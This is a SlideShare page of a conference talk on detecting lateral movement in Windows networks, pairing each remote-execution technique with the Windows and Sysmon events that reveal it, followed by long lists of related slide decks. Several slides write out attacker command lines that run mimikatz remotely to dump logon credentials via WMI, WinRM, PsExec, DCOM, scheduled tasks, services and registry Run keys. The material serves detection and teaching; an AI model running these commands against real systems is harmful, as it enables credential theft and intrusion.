SlideShare a Scribd company logo

Hunting Lateral Movement Windows Infrastructure Techniques Detection

Sergey Soldatov
Sergey Soldatov

Positive Hack days 2017

Technology
1 of 52
Download to read offline
Hunting Lateral Movement in Windows Infrastructure Teymur Kheirkhabarov
Who Am I • Senior SOC Analyst @Kaspersky Lab • SibSAU (Krasnoyarsk) graduate • Ex- Infosec dept. head • Ex- Infosec admin • Ex- System admin • Twitter @HeirhabarovT • www.linkedin.com/in/teymur-kheirkhabarov-73490867/
What we’re going to talk about • Different ways to launch executables remotely by using compromised credentials and operating system functionality; • How to detect remotely launched executables with Windows Event and Sysmon logs.
Remote file copy over SMB • Copy to autostart locations for execution on login or boot • Copy to different locations for further execution via WMI, WinRM, Powershell Remoting, Task Scheduler, Service… • Programmatically • Using Explorer • Using standard console tools: • robocopy C:tools pc0002ADMIN$userspublic mimikatz.exe • powershell Copy-Item -Path mimikatz.exe -Destination pc0002C$userspublic • cmd /c "copy mimikatz.exe pc0002C$userspublic" • xcopy mimikatz.exe pc0002C$ProgramDataMicrosoftWindowsStart MenuProgramsStartup How • TCP/455 port is accessible on remote host • Administrative shares are enabled on remote host Requirements & limitations
Remote File Copy over SMB – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Administrative share access (Windows EID 5140/5145) E4. File object access with WriteData or AddFile rights (Windows EID 4663) – if audit and SACL were configured
Remote File Copy over SMB – the most interesting events
Hunting: search for administrative shares connections
Windows File Auditing https://www.malwarearchaeology.com/s/Windows- File-Auditing-Cheat-Sheet-ver-Oct-2016.pdf
Hunting: search for file creation/changes in autostart locations
Remote execution via WMI • Programmatically • Using standard tools: • wmic /node:pc0002 process call create "cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" • powershell Invoke-WmiMethod -ComputerName pc0002 -Class Win32_Process - Name Create -ArgumentList '"cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt"' • powershell -command "&{$process = [WMICLASS]'pc0002ROOTCIMV2:win32_process'; $process.Create('calc.exe'); }" • powershell -command "&{$process = get-wmiobject -query 'SELECT * FROM Meta_Class WHERE __Class = "Win32_Process"' -namespace 'rootcimv2' - computername pc0002; $process.Create( 'notepad.exe' );}" How • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host Requirements & limitations
Remote execution via WMI – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. WmiPrvSE.exe starts payload file (Sysmon EID 1)
Remote execution via WMI – the most interesting events
Remote execution via WinRM • Programmatically • Using Windows Remote Shell (WinRS) tool: • winrs -r:pc0002.test.local C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit • winrs -r:pc0002.test.local -u:dadmin C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit How • WinRM is enabled on remote host (disabled by default on client Windows versions) • TCP/5985 (TCP/5986) port is accessible on remote host Requirements & limitations
Remote execution via WinRM – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. svchost.exe starts WinrsHost.exe (Sysmon EID 1) E4. WinrsHost.exe starts payload file (Sysmon EID 1)
Remote execution via WinRM – the most interesting events
Remote execution via Powershell Remoting • Powershell scripts • Powershell Invoke-Command cmdlet: • powershell Invoke-Command -ComputerName pc0002.test.local -ScriptBlock {cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicpc0002_mimikatz_output.txt } • powershell Invoke-Command -ComputerName pc0002.test.local -credential TESTdadmin -ScriptBlock {cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicpc0002_mimikatz_output.txt } How • WinRM is enabled on remote host (disabled by default on client Windows versions) • TCP/5985 (TCP/5986) port is accessible on remote host Requirements & limitations
Remote execution via Powershell Remoting – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. svchost.exe starts wsmprovhost.exe (Sysmon EID 1) E4. wsmprovhost.exe starts payload file (Sysmon EID 1)
Remote execution via Powershell Remoting – the most interesting events
Remote execution via MMC20.Application COM How • Programmatically • Using powershell: powershell -command "&{$com=[activator]::CreateInstance([type]::GetTypeFromProgID('MMC20.Appli cation','pc0002.test.local')); $com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,'/c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicpc0002_mimikatz_output.txt','7')}" Requirements & limitations • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. svchost.exe starts mmc.exe (Sysmon EID 1) E4. mmc.exe starts payload file (Sysmon EID 1) Remote execution via MMC20.Application COM – events sequence on destination side
Remote execution via MMC20.Application COM – the most interesting events
Remote execution via PsExec (& clones, e.g. PaExec) • PsExex: • psexec.exe pc0002 -c mimikatz.exe privilege::debug sekurlsa::logonpasswords exit • PaExec: • paexec.exe pc0002 -c mimikatz.exe privilege::debug sekurlsa::logonpasswords exit How • ADMIN$ administrative share is enabled on remote host • TCP/445 port is accessible on remote host Requirements & limitations
E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Copying PSEXESVC.exe to ADMIN$ (Windows EID 5140/5145) E4. psexesvc service is installed and started (Windows EID 7045/7036) Remote execution via PsExec (& clones) – events sequence on destination side E5. psexesvc.exe is started by services.exe (Sysmon EID 1) E6. psexesvc.exe starts payload file (Sysmon EID 1) E7. Interaction with payload stdin/stdout/stderr via SMB pipes (Windows EID 5145)
Remote execution via PsExec (& clones) – the most interesting events
Hunting: search for PsExec (& clones) artifacts – services
Hunting: search for PsExec (& clones) artifacts – access to pipes
Remote execution via PsExec (& clones) – the most interesting events
Hunting: search for executions in network logon sessions (WinRM, WMI, PsExec, Powershell Remoting, MMC20 COM)
Remote execution via ShellWindows COM How • Programmatically • Using powershell: powershell -command "&{$obj = [activator]::CreateInstance([Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF- A442-00A0C90A8F39','pc0002')); $obj.item().Document.Application.ShellExecute('cmd.exe','/c calc.exe','C:WindowsSystem32',$null,0)}" Requirements & limitations • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
Remote execution via ShellBrowserWindow COM How • Programmatically • Using powershell: powershell -command "&{$obj = [activator]::CreateInstance([Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1- 8455-00A0C91F3880','pc0002')); $obj.Document.Application.ShellExecute('cmd.exe','/c calc.exe','C:WindowsSystem32',$null,0)}" Requirements & limitations • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host • Doesn’t work for Windows 7 destination https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) Remote execution via ShellWindows or ShellBrowserWindow COM – events sequence on destination side E3. explorer.exe starts payload file in current session (Sysmon EID 1)
Remote execution via via ShellWindows or ShellBrowserWindow COM – how to detect??? Payload file is executed in the session of the current active user
Remote execution via Scheduled Tasks • Programmatically • Standard command line tools: • at 172.16.205.14 3:55 C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> win_mimikatz_output.txt • schtasks /create /S pc0002 /SC ONCE /ST 00:57:00 /TN "Adobe Update" /TR "cmd.exe /c C:userspublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" How • TCP/135 port and RPC dynamic port range are accessible on remote host (in case of Schtasks usage) • TCP/445 port is accessible on remote host (in case of AT usage) Requirements & limitations
Remote execution via Scheduled Tasks – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Access to atsvc SMB Pipe (Windows EID 5145) – in case of at.exe usage E6. taskeng.exe starts payload file (Sysmon EID 1) E4. Scheduled task is created or updated (Windows EID 4698/4702) E5. Task is triggered. svchost.exe starts taskeng.exe (Sysmon EID 1) Also there are some interesting event in Microsoft-Windows-TaskScheduler/Operational event log
Remote execution via Scheduled Tasks – the most interesting events
Hunting: search for remotely created or updated scheduler tasks
Remote execution via Scheduled Tasks – the most interesting events
Hunting: search for ATSVC pipe connections
Remote execution via Services • Programmatically • Standard command line tool: • sc pc0002 create "Remote service" binPath= "cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" sc pc0002 start "Remote service" sc pc0002 delete »Remote service" How • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host Requirements & limitations
Remote execution via Services – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. New service is installed (Windows EID 7045/4697) E4. Start command is sent to installed service. services.exe starts payload file (Sysmon EID 1) E5. A timeout is reached (Windows EID 7009) E6. Failure while trying to start service (Windows EID 7000)
Remote execution via Services – the most interesting events
Hunting: search for remotely created services
Remote registry How • Programmatically • Using powershell or reg: • reg add pc0002HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /f /v GoogleUpdater /t REG_SZ /d "cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" • powershell -command "&{$reg=[Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey("LocalMachin e", "pc0002"); $key=$reg.OpenSubKey("SOFTWAREMicrosoftWindowsCurrentVersionRu n",$True); $key.SetValue("GoogleUpdater","calc.exe");}" Requirements & limitations • TCP/445 port is accessible on remote host • Remote Registry service is enabled on remote host
Remote registry – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. WINREG pipe access (Windows EID 5145) E4. Registry value is modified (Windows EID 4657) – if audit and SACL were configured
Remote Registry – the most interesting events
Hunting: search for WINREG pipe connections
Windows Registry Auditing https://www.malwarearchaeology.com/s/Windows- Registry-Auditing-Cheat-Sheet-ver-Oct-2016.pdf
Hunting: search for changes in autostart registry keys
Remote WMI subscriptions creation
Remote WMI subscriptions creation – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Writing to WMI Namespace (Windows EID 4662) – if audit and SACL were configured
WMI Namespaces Auditing
Remote WMI subscriptions creation – the most interesting events

Recommended

Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabTeymur Kheirkhabarov
 
Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Teymur Kheirkhabarov
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat HuntingGIBIN JOHN
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules CoverageSunny Neo
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter HimselfSergey Soldatov
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentTeymur Kheirkhabarov
 
Threat Hunting
Threat HuntingThreat Hunting
Threat HuntingSplunk
 

Recommended

Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabTeymur Kheirkhabarov
 
Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Teymur Kheirkhabarov
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat HuntingGIBIN JOHN
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules CoverageSunny Neo
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter HimselfSergey Soldatov
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentTeymur Kheirkhabarov
 
Threat Hunting
Threat HuntingThreat Hunting
Threat HuntingSplunk
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter HimselfTeymur Kheirkhabarov
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingDhruv Majumdar
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonBen Boyd
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghOWASP Delhi
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report Morane Decriem
 
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzBSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzChristopher Gerritz
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onSplunk
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceDhruv Majumdar
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with SplunkSplunk
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceVishal Kumar
 
Threat Hunting Workshop
Threat Hunting WorkshopThreat Hunting Workshop
Threat Hunting WorkshopSplunk
 
Maturity Model of Security Disciplines
Maturity Model of Security Disciplines Maturity Model of Security Disciplines
Maturity Model of Security Disciplines Florian Roth
 
MITRE ATT&CK framework
MITRE ATT&CK frameworkMITRE ATT&CK framework
MITRE ATT&CK frameworkBhushan Gurav
 
Malware analysis, threat intelligence and reverse engineering
Malware analysis, threat intelligence and reverse engineeringMalware analysis, threat intelligence and reverse engineering
Malware analysis, threat intelligence and reverse engineeringbartblaze
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onSplunk
 
Threat hunting and achieving security maturity
Threat hunting and achieving security maturityThreat hunting and achieving security maturity
Threat hunting and achieving security maturityDNIF
 
Windows Forensic 101
Windows Forensic 101Windows Forensic 101
Windows Forensic 101Digit Oktavianto
 
Threat Hunting for Command and Control Activity
Threat Hunting for Command and Control ActivityThreat Hunting for Command and Control Activity
Threat Hunting for Command and Control ActivitySqrrl
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
Kaspersky managed protection
Kaspersky managed protectionKaspersky managed protection
Kaspersky managed protectionSergey Soldatov
 
Горизонтальные перемещения в инфраструктуре Windows
Горизонтальные перемещения в инфраструктуре WindowsГоризонтальные перемещения в инфраструктуре Windows
Горизонтальные перемещения в инфраструктуре WindowsPositive Hack Days
 

More Related Content

What's hot

Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingDhruv Majumdar
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonBen Boyd
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghOWASP Delhi
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report Morane Decriem
 
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzBSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzChristopher Gerritz
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onSplunk
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceDhruv Majumdar
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with SplunkSplunk
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceVishal Kumar
 
Threat Hunting Workshop
Threat Hunting WorkshopThreat Hunting Workshop
Threat Hunting WorkshopSplunk
 
Maturity Model of Security Disciplines
Maturity Model of Security Disciplines Maturity Model of Security Disciplines
Maturity Model of Security Disciplines Florian Roth
 
MITRE ATT&CK framework
MITRE ATT&CK frameworkMITRE ATT&CK framework
MITRE ATT&CK frameworkBhushan Gurav
 
Malware analysis, threat intelligence and reverse engineering
Malware analysis, threat intelligence and reverse engineeringMalware analysis, threat intelligence and reverse engineering
Malware analysis, threat intelligence and reverse engineeringbartblaze
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onSplunk
 
Threat hunting and achieving security maturity
Threat hunting and achieving security maturityThreat hunting and achieving security maturity
Threat hunting and achieving security maturityDNIF
 
Threat Hunting for Command and Control Activity
Threat Hunting for Command and Control ActivityThreat Hunting for Command and Control Activity
Threat Hunting for Command and Control ActivitySqrrl
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 

What's hot (20)

A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat Hunting
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting season
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep Singh
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report
 
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzBSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-on
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat Intelligence
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with Splunk
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement Matrice
 
Threat Hunting Workshop
Threat Hunting WorkshopThreat Hunting Workshop
Threat Hunting Workshop
 
Maturity Model of Security Disciplines
Maturity Model of Security Disciplines Maturity Model of Security Disciplines
Maturity Model of Security Disciplines
 
MITRE ATT&CK framework
MITRE ATT&CK frameworkMITRE ATT&CK framework
MITRE ATT&CK framework
 
Malware analysis, threat intelligence and reverse engineering
Malware analysis, threat intelligence and reverse engineeringMalware analysis, threat intelligence and reverse engineering
Malware analysis, threat intelligence and reverse engineering
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-on
 
Threat hunting and achieving security maturity
Threat hunting and achieving security maturityThreat hunting and achieving security maturity
Threat hunting and achieving security maturity
 
Windows Forensic 101
Windows Forensic 101Windows Forensic 101
Windows Forensic 101
 
Threat Hunting for Command and Control Activity
Threat Hunting for Command and Control ActivityThreat Hunting for Command and Control Activity
Threat Hunting for Command and Control Activity
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 

Viewers also liked

Kaspersky managed protection
Kaspersky managed protectionKaspersky managed protection
Kaspersky managed protectionSergey Soldatov
 
Горизонтальные перемещения в инфраструктуре Windows
Горизонтальные перемещения в инфраструктуре WindowsГоризонтальные перемещения в инфраструктуре Windows
Горизонтальные перемещения в инфраструктуре WindowsPositive Hack Days
 
Ansible to provision your machines
Ansible to provision your machinesAnsible to provision your machines
Ansible to provision your machinesFellipe Callegas
 
Ansible party in the [Google] clouds
Ansible party in the [Google] cloudsAnsible party in the [Google] clouds
Ansible party in the [Google] cloudsEsther Lozano
 
Трудовые будни охотника на угрозы
Трудовые будни охотника на угрозыТрудовые будни охотника на угрозы
Трудовые будни охотника на угрозыSergey Soldatov
 
Threat hunting as SOC process
Threat hunting as SOC processThreat hunting as SOC process
Threat hunting as SOC processSergey Soldatov
 
Охота на угрозы на BIS summit 2016
Охота на угрозы на BIS summit 2016Охота на угрозы на BIS summit 2016
Охота на угрозы на BIS summit 2016Sergey Soldatov
 
PuppetConf 2017: Inviting Windows to the Puppet Party- Chris Kittell & Derek ...
PuppetConf 2017: Inviting Windows to the Puppet Party- Chris Kittell & Derek ...PuppetConf 2017: Inviting Windows to the Puppet Party- Chris Kittell & Derek ...
PuppetConf 2017: Inviting Windows to the Puppet Party- Chris Kittell & Derek ...Puppet
 
Pwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellBeau Bullock
 
BSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be HuntedBSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be HuntedAlex Davies
 
Obfuscating The Empire
Obfuscating The EmpireObfuscating The Empire
Obfuscating The EmpireRyan Cobb
 
A Case Study in Attacking KeePass
A Case Study in Attacking KeePassA Case Study in Attacking KeePass
A Case Study in Attacking KeePassWill Schroeder
 
SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMIJoe Slowik
 
Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017Daniel Bohannon
 
WMI for Penetration Testers - Arcticcon 2017
WMI for Penetration Testers - Arcticcon 2017WMI for Penetration Testers - Arcticcon 2017
WMI for Penetration Testers - Arcticcon 2017Alexander Polce Leary
 
Building Better Backdoors with WMI - DerbyCon 2017
Building Better Backdoors with WMI - DerbyCon 2017Building Better Backdoors with WMI - DerbyCon 2017
Building Better Backdoors with WMI - DerbyCon 2017Alexander Polce Leary
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueWill Schroeder
 
Taking the Attacker Eviction Red Pill (v2.0)
Taking the Attacker Eviction Red Pill (v2.0)Taking the Attacker Eviction Red Pill (v2.0)
Taking the Attacker Eviction Red Pill (v2.0)Frode Hommedal
 
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...Chris Thompson
 

Viewers also liked (20)

Kaspersky managed protection
Kaspersky managed protectionKaspersky managed protection
Kaspersky managed protection
 
Горизонтальные перемещения в инфраструктуре Windows
Горизонтальные перемещения в инфраструктуре WindowsГоризонтальные перемещения в инфраструктуре Windows
Горизонтальные перемещения в инфраструктуре Windows
 
Ansible to provision your machines
Ansible to provision your machinesAnsible to provision your machines
Ansible to provision your machines
 
Ansible party in the [Google] clouds
Ansible party in the [Google] cloudsAnsible party in the [Google] clouds
Ansible party in the [Google] clouds
 
Трудовые будни охотника на угрозы
Трудовые будни охотника на угрозыТрудовые будни охотника на угрозы
Трудовые будни охотника на угрозы
 
Threat hunting as SOC process
Threat hunting as SOC processThreat hunting as SOC process
Threat hunting as SOC process
 
Охота на угрозы на BIS summit 2016
Охота на угрозы на BIS summit 2016Охота на угрозы на BIS summit 2016
Охота на угрозы на BIS summit 2016
 
PuppetConf 2017: Inviting Windows to the Puppet Party- Chris Kittell & Derek ...
PuppetConf 2017: Inviting Windows to the Puppet Party- Chris Kittell & Derek ...PuppetConf 2017: Inviting Windows to the Puppet Party- Chris Kittell & Derek ...
PuppetConf 2017: Inviting Windows to the Puppet Party- Chris Kittell & Derek ...
 
Pwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShell
 
BSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be HuntedBSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be Hunted
 
Obfuscating The Empire
Obfuscating The EmpireObfuscating The Empire
Obfuscating The Empire
 
A Case Study in Attacking KeePass
A Case Study in Attacking KeePassA Case Study in Attacking KeePass
A Case Study in Attacking KeePass
 
Ace Up the Sleeve
Ace Up the SleeveAce Up the Sleeve
Ace Up the Sleeve
 
SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMI
 
Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017
 
WMI for Penetration Testers - Arcticcon 2017
WMI for Penetration Testers - Arcticcon 2017WMI for Penetration Testers - Arcticcon 2017
WMI for Penetration Testers - Arcticcon 2017
 
Building Better Backdoors with WMI - DerbyCon 2017
Building Better Backdoors with WMI - DerbyCon 2017Building Better Backdoors with WMI - DerbyCon 2017
Building Better Backdoors with WMI - DerbyCon 2017
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs Blue
 
Taking the Attacker Eviction Red Pill (v2.0)
Taking the Attacker Eviction Red Pill (v2.0)Taking the Attacker Eviction Red Pill (v2.0)
Taking the Attacker Eviction Red Pill (v2.0)
 
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...
 

Similar to Hunting Lateral Movement Windows Infrastructure Techniques Detection

Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE Dragos, Inc.
 
Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#Mauricio Velazco
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 
Owning computers without shell access 2
Owning computers without shell access 2Owning computers without shell access 2
Owning computers without shell access 2Royce Davis
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
